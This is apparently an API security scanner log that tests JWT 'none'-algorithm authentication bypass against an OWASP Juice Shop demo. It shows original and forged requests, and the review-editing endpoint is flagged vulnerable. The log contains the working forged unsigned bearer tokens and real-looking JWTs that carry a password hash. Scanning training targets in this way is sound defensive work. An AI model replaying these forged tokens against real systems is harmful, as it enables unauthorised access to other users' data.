output.txt
Api collection: 1689063104 juice_shop_demo
API: https://juiceshop.akto.io/rest/products/reviews PATCH
Test: NO_AUTH JWT_NONE_ALGO Vulnerable: true
Original request : {"Origin":"https://juiceshop.akto.io","Cookie":"language=en; welcomebanner_status=dismiss; cookieconsent_status=dismiss; continueCode=v7BmaPZbQ7NroLqvm1YzMVnwOBAVkTefndgpE5jkJlXey43R68K2D9xWNQgq; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.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.JYBu5fv--c9xic_A3yLhvcy2p5o6YjvsVSDnDJ8f5x5cFq5MBfm-Q3a9PrkzFk37QI9nkAsCHXp7lOOdI72sUjHyqZiBu3PT7XzOQmkf8G3D0QZn51oX-bzCEDKbprFoBi5a14duxQvuGhHakoK1La9x8Dgz0SQikeAEsDH6xzo","Accept":"application/json, text/plain, */*","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36","Referer":"https://juiceshop.akto.io/","Connection":"close","Sec-Fetch-Site":"same-origin","Sec-Fetch-Dest":"empty","Host":"juiceshop.akto.io","Accept-Encoding":"gzip, deflate","Sec-Fetch-Mode":"cors","Authorization":"Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6MjEsInVzZXJuYW1lIjoidmljdGltIiwiZW1haWwiOiJ2aWN0aW1AZ21haWwuY29tIiwicGFzc3dvcmQiOiJhNjJlN2JlMGE1NjQwODFiNmE5Zjc1MzA4MjA4YzQzMyIsInJvbGUiOiJjdXN0b21lciIsImRlbHV4ZVRva2VuIjoiIiwibGFzdExvZ2luSXAiOiIiLCJwcm9maWxlSW1hZ2UiOiJhc3NldHMvcHVibGljL2ltYWdlcy91cGxvYWRzL2RlZmF1bHQuc3ZnIiwidG90cFNlY3JldCI6IiIsImlzQWN0aXZlIjp0cnVlLCJjcmVhdGVkQXQiOiIyMDIzLTAzLTEwIDA1OjM5OjE4LjI5OSArMDA6MDAiLCJ1cGRhdGVkQXQiOiIyMDIzLTAzLTEwIDA1OjM5OjE4LjI5OSArMDA6MDAiLCJkZWxldGVkQXQiOm51bGx9LCJpYXQiOjE2Nzg0MjY4NjUsImV4cCI6MTk5Mzc4Njg2NX0.bUvn24at2rOcuht5hto8QHl7pXdanuLKQDBxqH2MWG2-mMEI8LgWm1R9HhUD209dHL93Ks52KijKJFOlF_5Z3-v47jY-Rf73wcA_Le69-n7EudWwrc_X6EGpNiqovVYm31RZQnU2Q_H-PtzpnzNIOnfE6z_p023acrke-cZkKss","sec-ch-ua":"\"Not A(Brand\";v=\"24\", \"Chromium\";v=\"110\"","sec-ch-ua-mobile":"?0","sec-ch-ua-platform":"\"macOS\"","Accept-Language":"en-GB,en-US;q=0.9,en;q=0.8","Content-Length":"48","Content-Type":"application/json"}
{"id":"Q9ETXE3j6YApqTkyq","message":"Bad apple"}
Original response: {"X-Frame-Options":"SAMEORIGIN","X-Recruiting":"/#/jobs","Access-Control-Allow-Origin":"*","ETag":"W/\"11a-wFugoEQ0LqvlHgq2VF+QBdLu144\"","X-Content-Type-Options":"nosniff","Connection":"close","Feature-Policy":"payment 'self'","Vary":"Accept-Encoding","Content-Length":"282","Date":"Thu, 09 Mar 2023 14:50:46 GMT","Content-Type":"application/json; charset=utf-8"}
{"modified":1,"original":[{"message":"Best thing ever!","author":"victim@gmail.com","product":1,"likesCount":0,"likedBy":[],"_id":"Q9ETXE3j6YApqTkyq"}],"updated":[{"message":"Bad apple","author":"victim@gmail.com","product":1,"likesCount":0,"likedBy":[],"_id":"Q9ETXE3j6YApqTkyq"}]}
Attempted request : {url=https://juiceshop.akto.io/rest/products/reviews, method=PATCH, type=HTTP/1.1, queryParams=null, body={"id":"Q9ETXE3j6YApqTkyq","message":"Bad apple"}, headers={"sec-fetch-mode":"cors","content-length":"48","sec-fetch-site":"same-origin","cookie":"language=en; welcomebanner_status=dismiss; cookieconsent_status=dismiss; continueCode=v7BmaPZbQ7NroLqvm1YzMVnwOBAVkTefndgpE5jkJlXey43R68K2D9xWNQgq; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.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.JYBu5fv--c9xic_A3yLhvcy2p5o6YjvsVSDnDJ8f5x5cFq5MBfm-Q3a9PrkzFk37QI9nkAsCHXp7lOOdI72sUjHyqZiBu3PT7XzOQmkf8G3D0QZn51oX-bzCEDKbprFoBi5a14duxQvuGhHakoK1La9x8Dgz0SQikeAEsDH6xzo","accept-language":"en-GB,en-US;q=0.9,en;q=0.8","origin":"https://juiceshop.akto.io","x-akto-ignore":"0","accept":"application/json, text/plain, */*","authorization":"Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.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.","sec-ch-ua":"\"Not A(Brand\";v=\"24\", \"Chromium\";v=\"110\"","sec-ch-ua-mobile":"?0","sec-ch-ua-platform":"\"macOS\"","host":"juiceshop.akto.io","connection":"close","content-type":"application/json","accept-encoding":"gzip, deflate","user-agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36","sec-fetch-dest":"empty"}}
Attempted response: {statusCode=200.0, body={"modified":1,"original":[{"_id":"Q9ETXE3j6YApqTkyq","message":"Bad apple","author":"victim@gmail.com","product":1,"likesCount":0,"likedBy":[]}],"updated":[{"_id":"Q9ETXE3j6YApqTkyq","message":"Bad apple","author":"victim@gmail.com","product":1,"likesCount":0,"likedBy":[]}]}, headers={"date":"Fri, 29 Sep 2023 08:58:26 GMT","access-control-allow-origin":"*","content-length":"275","x-content-type-options":"nosniff","x-recruiting":"/#/jobs","vary":"Accept-Encoding","x-frame-options":"SAMEORIGIN","content-type":"application/json; charset=utf-8","etag":"W/\"113-LsYk5hInHrGt2Lkrbfy5tE6d6Ps\"","feature-policy":"payment 'self'"}}
------------------------------------
API: https://juiceshop.akto.io/ GET
Test: NO_AUTH JWT_NONE_ALGO Vulnerable: false
Original request : {"Cookie":"language=en; welcomebanner_status=dismiss; cookieconsent_status=dismiss; continueCode=v7BmaPZbQ7NroLqvm1YzMVnwOBAVkTefndgpE5jkJlXey43R68K2D9xWNQgq","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36","Connection":"close","Sec-Fetch-Site":"none","Sec-Fetch-Dest":"document","Host":"juiceshop.akto.io","Accept-Encoding":"gzip, deflate","Sec-Fetch-Mode":"navigate","sec-ch-ua":"\"Not A(Brand\";v=\"24\", \"Chromium\";v=\"110\"","sec-ch-ua-mobile":"?0","Upgrade-Insecure-Requests":"1","sec-ch-ua-platform":"\"macOS\"","Sec-Fetch-User":"?1","Accept-Language":"en-GB,en-US;q=0.9,en;q=0.8"}
Original response: {"Access-Control-Allow-Origin":"*","X-Content-Type-Options":"nosniff","Connection":"close","Last-Modified":"Thu, 09 Mar 2023 14:46:29 GMT","Date":"Thu, 09 Mar 2023 14:48:39 GMT","X-Frame-Options":"SAMEORIGIN","Accept-Ranges":"bytes","X-Recruiting":"/#/jobs","Cache-Control":"public, max-age=0","ETag":"W/\"7c3-186c6d67748\"","Feature-Policy":"payment 'self'","Vary":"Accept-Encoding","Content-Length":"1987","Content-Type":"text/html; charset=UTF-8"}
<!--
~ Copyright (c) 2014-2023 Bjoern Kimminich & the OWASP Juice Shop contributors.
~ SPDX-License-Identifier: MIT
--><!DOCTYPE html><html lang="en"><head>
<meta charset="utf-8">
<title>OWASP Juice Shop</title>
<meta name="description" content="Probably the most modern and sophisticated insecure web application">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link id="favicon" rel="icon" type="image/x-icon" href="assets/public/favicon_js.ico">
<link rel="stylesheet" type="text/css" href="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.css">
<script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script>
window.addEventListener("load", function(){
window.cookieconsent.initialise({
"palette": {
"popup": { "background": "#546e7a", "text": "#ffffff" },
"button": { "background": "#558b2f", "text": "#ffffff" }
},
"theme": "classic",
"position": "bottom-right",
"content": { "message": "This website uses fruit cookies to ensure you get the juiciest tracking experience.", "dismiss": "Me want it!", "link": "But me wait!", "href": "https://www.youtube.com/watch?v=9PnbKL3wuH4" }
})});
</script>
<style>.bluegrey-lightgreen-theme.mat-app-background{background-color:#303030;color:#fff}@charset "UTF-8";@media screen and (-webkit-min-device-pixel-ratio:0){}</style><link rel="stylesheet" href="styles.css" media="print" onload="this.media='all'"><noscript><link rel="stylesheet" href="styles.css"></noscript></head>
<body class="mat-app-background bluegrey-lightgreen-theme">
<app-root></app-root>
<script src="runtime.js" type="module"></script><script src="polyfills.js" type="module"></script><script src="vendor.js" type="module"></script><script src="main.js" type="module"></script>
</body></html>
Attempted errors :
Error 1: Request API failed to satisfy api_selection_filters block, skipping execution
------------------------------------
API: https://juiceshop.akto.io/api/Cards GET
Test: NO_AUTH JWT_NONE_ALGO Vulnerable: false
Original request : {"Cookie":"language=en; welcomebanner_status=dismiss; cookieconsent_status=dismiss; continueCode=v7BmaPZbQ7NroLqvm1YzMVnwOBAVkTefndgpE5jkJlXey43R68K2D9xWNQgq; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.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.JYBu5fv--c9xic_A3yLhvcy2p5o6YjvsVSDnDJ8f5x5cFq5MBfm-Q3a9PrkzFk37QI9nkAsCHXp7lOOdI72sUjHyqZiBu3PT7XzOQmkf8G3D0QZn51oX-bzCEDKbprFoBi5a14duxQvuGhHakoK1La9x8Dgz0SQikeAEsDH6xzo","Accept":"application/json, text/plain, */*","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36","Referer":"https://juiceshop.akto.io/","Connection":"close","Sec-Fetch-Site":"same-origin","Sec-Fetch-Dest":"empty","Host":"juiceshop.akto.io","Accept-Encoding":"gzip, deflate","Sec-Fetch-Mode":"cors","Authorization":"Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.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.bUvn24at2rOcuht5hto8QHl7pXdanuLKQDBxqH2MWG2-mMEI8LgWm1R9HhUD209dHL93Ks52KijKJFOlF_5Z3-v47jY-Rf73wcA_Le69-n7EudWwrc_X6EGpNiqovVYm31RZQnU2Q_H-PtzpnzNIOnfE6z_p023acrke-cZkKss","sec-ch-ua":"\"Not A(Brand\";v=\"24\", \"Chromium\";v=\"110\"","sec-ch-ua-mobile":"?0","sec-ch-ua-platform":"\"macOS\"","Accept-Language":"en-GB,en-US;q=0.9,en;q=0.8"}
Original response: {"X-Frame-Options":"SAMEORIGIN","X-Recruiting":"/#/jobs","Access-Control-Allow-Origin":"*","ETag":"W/\"89-SBgYQrlZNItdhh51fhg39LT9OzY\"","X-Content-Type-Options":"nosniff","Connection":"close","Feature-Policy":"payment 'self'","Vary":"Accept-Encoding","Content-Length":"137","Date":"Thu, 09 Mar 2023 14:51:23 GMT","Content-Type":"application/json; charset=utf-8"}
{"status":"success","data":[{"UserId":21,"id":2,"fullName":"Innocent victim","cardNum":"************1111","expMonth":12,"expYear":2092}]}
Attempted request : {url=https://juiceshop.akto.io/api/Cards, method=GET, type=HTTP/1.1, queryParams=null, body=, headers={"sec-fetch-mode":"cors","sec-fetch-site":"same-origin","cookie":"language=en; welcomebanner_status=dismiss; cookieconsent_status=dismiss; continueCode=v7BmaPZbQ7NroLqvm1YzMVnwOBAVkTefndgpE5jkJlXey43R68K2D9xWNQgq; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.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.JYBu5fv--c9xic_A3yLhvcy2p5o6YjvsVSDnDJ8f5x5cFq5MBfm-Q3a9PrkzFk37QI9nkAsCHXp7lOOdI72sUjHyqZiBu3PT7XzOQmkf8G3D0QZn51oX-bzCEDKbprFoBi5a14duxQvuGhHakoK1La9x8Dgz0SQikeAEsDH6xzo","accept-language":"en-GB,en-US;q=0.9,en;q=0.8","x-akto-ignore":"0","accept":"application/json, text/plain, */*","authorization":"Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.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.","sec-ch-ua":"\"Not A(Brand\";v=\"24\", \"Chromium\";v=\"110\"","sec-ch-ua-mobile":"?0","sec-ch-ua-platform":"\"macOS\"","host":"juiceshop.akto.io","connection":"close","accept-encoding":"gzip, deflate","user-agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36","sec-fetch-dest":"empty"}}
Attempted response: {statusCode=401.0, body={"status":"error","message":{}}, headers={"date":"Fri, 29 Sep 2023 08:58:25 GMT","access-control-allow-origin":"*","content-length":"31","x-content-type-options":"nosniff","x-recruiting":"/#/jobs","vary":"Accept-Encoding","x-frame-options":"SAMEORIGIN","content-type":"application/json; charset=utf-8","etag":"W/\"1f-Sc96etNbljMus8t9iaktsJ/FpRk\"","feature-policy":"payment 'self'"}}
------------------------------------
API: https://juiceshop.akto.io/api/Challenges/ GET
Test: NO_AUTH JWT_NONE_ALGO Vulnerable: false
Original request : {"Cookie":"language=en; welcomebanner_status=dismiss; cookieconsent_status=dismiss; continueCode=v7BmaPZbQ7NroLqvm1YzMVnwOBAVkTefndgpE5jkJlXey43R68K2D9xWNQgq","Accept":"application/json, text/plain, */*","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36","Referer":"https://juiceshop.akto.io/","Connection":"close","Sec-Fetch-Site":"same-origin","Sec-Fetch-Dest":"empty","Host":"juiceshop.akto.io","Accept-Encoding":"gzip, deflate","Sec-Fetch-Mode":"cors","sec-ch-ua":"\"Not A(Brand\";v=\"24\", \"Chromium\";v=\"110\"","sec-ch-ua-mobile":"?0","sec-ch-ua-platform":"\"macOS\"","Accept-Language":"en-GB,en-US;q=0.9,en;q=0.8"}
Original response: {"X-Frame-Options":"SAMEORIGIN","X-Recruiting":"/#/jobs","Access-Control-Allow-Origin":"*","ETag":"W/\"270-TLpQRrZ3aLAzt1bM+TdVQ5Rl+ms\"","X-Content-Type-Options":"nosniff","Connection":"close","Feature-Policy":"payment 'self'","Vary":"Accept-Encoding","Content-Length":"624","Date":"Thu, 09 Mar 2023 14:48:39 GMT","Content-Type":"application/json; charset=utf-8"}
{"status":"success","data":[{"id":69,"key":"scoreBoardChallenge","name":"Score Board","category":"Miscellaneous","tags":"Tutorial,Code Analysis","description":"Find the carefully hidden 'Score Board' page.","difficulty":1,"hint":"Try to find a reference or clue behind the scenes. Or simply guess what URL the Score Board might have.","hintUrl":"https://pwning.owasp-juice.shop/part2/score-board.html#find-the-carefully-hidden-score-board-page","mitigationUrl":null,"solved":false,"disabledEnv":null,"tutorialOrder":1,"codingChallengeStatus":0,"createdAt":"2023-03-09T14:46:29.307Z","updatedAt":"2023-03-09T14:46:29.307Z"}]}
Attempted errors :
Error 1: Request API failed to satisfy api_selection_filters block, skipping execution
------------------------------------
API: https://juiceshop.akto.io/api/Feedbacks/ POST
Test: NO_AUTH JWT_NONE_ALGO Vulnerable: false
Original request : {"Origin":"https://juiceshop.akto.io","Cookie":"language=en; welcomebanner_status=dismiss; cookieconsent_status=dismiss; continueCode=v7BmaPZbQ7NroLqvm1YzMVnwOBAVkTefndgpE5jkJlXey43R68K2D9xWNQgq; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.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.JYBu5fv--c9xic_A3yLhvcy2p5o6YjvsVSDnDJ8f5x5cFq5MBfm-Q3a9PrkzFk37QI9nkAsCHXp7lOOdI72sUjHyqZiBu3PT7XzOQmkf8G3D0QZn51oX-bzCEDKbprFoBi5a14duxQvuGhHakoK1La9x8Dgz0SQikeAEsDH6xzo","Accept":"application/json, text/plain, */*","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36","Referer":"https://juiceshop.akto.io/","Connection":"close","Sec-Fetch-Site":"same-origin","Sec-Fetch-Dest":"empty","Host":"juiceshop.akto.io","Accept-Encoding":"gzip, deflate","Sec-Fetch-Mode":"cors","Authorization":"Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.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.bUvn24at2rOcuht5hto8QHl7pXdanuLKQDBxqH2MWG2-mMEI8LgWm1R9HhUD209dHL93Ks52KijKJFOlF_5Z3-v47jY-Rf73wcA_Le69-n7EudWwrc_X6EGpNiqovVYm31RZQnU2Q_H-PtzpnzNIOnfE6z_p023acrke-cZkKss","sec-ch-ua":"\"Not A(Brand\";v=\"24\", \"Chromium\";v=\"110\"","sec-ch-ua-mobile":"?0","sec-ch-ua-platform":"\"macOS\"","Accept-Language":"en-GB,en-US;q=0.9,en;q=0.8","Content-Length":"94","Content-Type":"application/json"}
{"UserId":21,"captchaId":0,"captcha":"-80","comment":"good app (***tim@gmail.com)","rating":2}
Original response: {"X-Frame-Options":"SAMEORIGIN","X-Recruiting":"/#/jobs","Access-Control-Allow-Origin":"*","ETag":"W/\"b1-RGj+iA65qS7kTluS9ShY0SpRW6U\"","X-Content-Type-Options":"nosniff","Connection":"close","Feature-Policy":"payment 'self'","Vary":"Accept-Encoding","Content-Length":"177","Date":"Thu, 09 Mar 2023 14:51:13 GMT","Location":"/api/Feedbacks/8","Content-Type":"application/json; charset=utf-8"}
{"status":"success","data":{"id":8,"UserId":21,"comment":"good app (***tim@gmail.com)","rating":2,"updatedAt":"2023-03-09T14:51:13.965Z","createdAt":"2023-03-09T14:51:13.965Z"}}
Attempted request : {url=https://juiceshop.akto.io/api/Feedbacks/, method=POST, type=HTTP/1.1, queryParams=null, body={"UserId":21,"captchaId":0,"captcha":"-80","comment":"good app (***tim@gmail.com)","rating":2}, headers={"sec-fetch-mode":"cors","content-length":"94","sec-fetch-site":"same-origin","cookie":"language=en; welcomebanner_status=dismiss; cookieconsent_status=dismiss; continueCode=v7BmaPZbQ7NroLqvm1YzMVnwOBAVkTefndgpE5jkJlXey43R68K2D9xWNQgq; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.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.JYBu5fv--c9xic_A3yLhvcy2p5o6YjvsVSDnDJ8f5x5cFq5MBfm-Q3a9PrkzFk37QI9nkAsCHXp7lOOdI72sUjHyqZiBu3PT7XzOQmkf8G3D0QZn51oX-bzCEDKbprFoBi5a14duxQvuGhHakoK1La9x8Dgz0SQikeAEsDH6xzo","accept-language":"en-GB,en-US;q=0.9,en;q=0.8","origin":"https://juiceshop.akto.io","x-akto-ignore":"0","accept":"application/json, text/plain, */*","authorization":"Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.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.","sec-ch-ua":"\"Not A(Brand\";v=\"24\", \"Chromium\";v=\"110\"","sec-ch-ua-mobile":"?0","sec-ch-ua-platform":"\"macOS\"","host":"juiceshop.akto.io","connection":"close","content-type":"application/json","accept-encoding":"gzip, deflate","user-agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36","sec-fetch-dest":"empty"}}
Attempted response: {statusCode=401.0, body=Wrong answer to CAPTCHA. Please try again., headers={"date":"Fri, 29 Sep 2023 08:58:26 GMT","access-control-allow-origin":"*","content-length":"42","x-content-type-options":"nosniff","x-recruiting":"/#/jobs","vary":"Accept-Encoding","x-frame-options":"SAMEORIGIN","content-type":"text/html; charset=utf-8","etag":"W/\"2a-0bhawgvZt+oT5sCkemBQdamCIP0\"","feature-policy":"payment 'self'"}}
------------------------------------
API: https://juiceshop.akto.io/api/Quantitys/ GET
Test: NO_AUTH JWT_NONE_ALGO Vulnerable: false
Original request : {"Cookie":"language=en; welcomebanner_status=dismiss; cookieconsent_status=dismiss; continueCode=v7BmaPZbQ7NroLqvm1YzMVnwOBAVkTefndgpE5jkJlXey43R68K2D9xWNQgq","Accept":"application/json, text/plain, */*","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36","Referer":"https://juiceshop.akto.io/","Connection":"close","Sec-Fetch-Site":"same-origin","Sec-Fetch-Dest":"empty","Host":"juiceshop.akto.io","Accept-Encoding":"gzip, deflate","Sec-Fetch-Mode":"cors","sec-ch-ua":"\"Not A(Brand\";v=\"24\", \"Chromium\";v=\"110\"","sec-ch-ua-mobile":"?0","sec-ch-ua-platform":"\"macOS\"","Accept-Language":"en-GB,en-US;q=0.9,en;q=0.8"}
Original response: {"X-Frame-Options":"SAMEORIGIN","X-Recruiting":"/#/jobs","Access-Control-Allow-Origin":"*","ETag":"W/\"1767-X/Pg1v7ucUbFOCl+zVcvncfYQCM\"","X-Content-Type-Options":"nosniff","Connection":"close","Feature-Policy":"payment 'self'","Vary":"Accept-Encoding","Content-Length":"5991","Date":"Thu, 09 Mar 2023 14:48:39 GMT","Content-Type":"application/json; charset=utf-8"}
{"status":"success","data":[{"ProductId":1,"id":1,"quantity":95,"limitPerUser":5,"createdAt":"2023-03-09T14:46:29.405Z","updatedAt":"2023-03-09T14:46:29.405Z"},{"ProductId":2,"id":2,"quantity":64,"limitPerUser":null,"createdAt":"2023-03-09T14:46:29.405Z","updatedAt":"2023-03-09T14:46:29.405Z"},{"ProductId":3,"id":3,"quantity":97,"limitPerUser":null,"createdAt":"2023-03-09T14:46:29.405Z","updatedAt":"2023-03-09T14:46:29.405Z"},{"ProductId":4,"id":4,"quantity":70,"limitPerUser":null,"createdAt":"2023-03-09T14:46:29.405Z","updatedAt":"2023-03-09T14:46:29.405Z"},{"ProductId":5,"id":5,"quantity":60,"limitPerUser":5,"createdAt":"2023-03-09T14:46:29.405Z","updatedAt":"2023-03-09T14:46:29.405Z"},{"ProductId":6,"id":6,"quantity":64,"limitPerUser":null,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":7,"id":7,"quantity":56,"limitPerUser":5,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":8,"id":8,"quantity":67,"limitPerUser":null,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":9,"id":9,"quantity":33,"limitPerUser":null,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":10,"id":10,"quantity":60,"limitPerUser":null,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":11,"id":11,"quantity":79,"limitPerUser":null,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":12,"id":12,"quantity":49,"limitPerUser":null,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":13,"id":13,"quantity":70,"limitPerUser":null,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":14,"id":14,"quantity":51,"limitPerUser":null,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":15,"id":15,"quantity":44,"limitPerUser":null,"createdAt":"2023-03-09
T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":16,"id":16,"quantity":44,"limitPerUser":null,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":17,"id":17,"quantity":49,"limitPerUser":null,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":18,"id":18,"quantity":37,"limitPerUser":null,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":19,"id":19,"quantity":93,"limitPerUser":null,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":20,"id":20,"quantity":5,"limitPerUser":5,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":21,"id":21,"quantity":70,"limitPerUser":null,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":22,"id":22,"quantity":68,"limitPerUser":null,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":23,"id":23,"quantity":86,"limitPerUser":null,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":24,"id":24,"quantity":64,"limitPerUser":5,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":25,"id":25,"quantity":43,"limitPerUser":null,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":26,"id":26,"quantity":68,"limitPerUser":null,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":27,"id":27,"quantity":0,"limitPerUser":null,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":28,"id":28,"quantity":33,"limitPerUser":null,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":29,"id":29,"quantity":53,"limitPerUser":null,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":30,"id":30,"quantity"
:94,"limitPerUser":null,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":31,"id":31,"quantity":72,"limitPerUser":null,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":32,"id":32,"quantity":57,"limitPerUser":null,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":33,"id":33,"quantity":3,"limitPerUser":1,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":34,"id":34,"quantity":0,"limitPerUser":null,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":35,"id":35,"quantity":8,"limitPerUser":null,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":36,"id":36,"quantity":0,"limitPerUser":null,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":37,"id":37,"quantity":0,"limitPerUser":null,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":38,"id":38,"quantity":0,"limitPerUser":1,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":39,"id":39,"quantity":55,"limitPerUser":5,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":40,"id":40,"quantity":2,"limitPerUser":1,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":41,"id":41,"quantity":1,"limitPerUser":1,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":42,"id":42,"quantity":1,"limitPerUser":null,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":43,"id":43,"quantity":3,"limitPerUser":1,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"},{"ProductId":44,"id":44,"quantity":66,"limitPerUser":1,"createdAt":"2023-03-09T14:46:29.406Z","updatedAt":"2023-03-09T14:46:29.406Z"}]}
Attempted errors :
Error 1: Request API failed to satisfy api_selection_filters block, skipping execution
------------------------------------
API: https://juiceshop.akto.io/redirect GET
Test: NO_AUTH JWT_NONE_ALGO Vulnerable: false
